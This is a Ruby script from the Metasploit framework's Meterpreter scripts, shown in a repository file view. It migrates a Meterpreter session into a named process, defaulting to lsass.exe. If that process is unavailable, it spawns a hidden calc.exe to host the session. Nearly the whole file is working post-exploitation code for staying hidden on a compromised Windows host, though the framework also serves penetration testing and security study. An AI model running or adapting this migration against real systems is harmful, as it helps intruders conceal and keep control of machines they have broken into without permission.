Files
metasploit-gs/scripts/meterpreter/migrate.rb
T
James Lee 0a6bb91cb9 keywords
git-svn-id: file:///home/svn/framework3/trunk@7276 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:14:28 +00:00

32 lines
777 B
Ruby

# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#
# Get the target process name
target = args[0] || "lsass.exe"
print_status("Migrating to #{target}...")
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")
# Get the target process pid
target_pid = client.sys.process[target]
if not target_pid
print_error("Could not access the target process")
print_status("Spawning a calc.exe host process...")
calc = client.sys.process.execute('calc.exe', nil, {'Hidden' => true })
target_pid = calc.pid
end
# Do the migration
client.core.migrate(target_pid)
server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")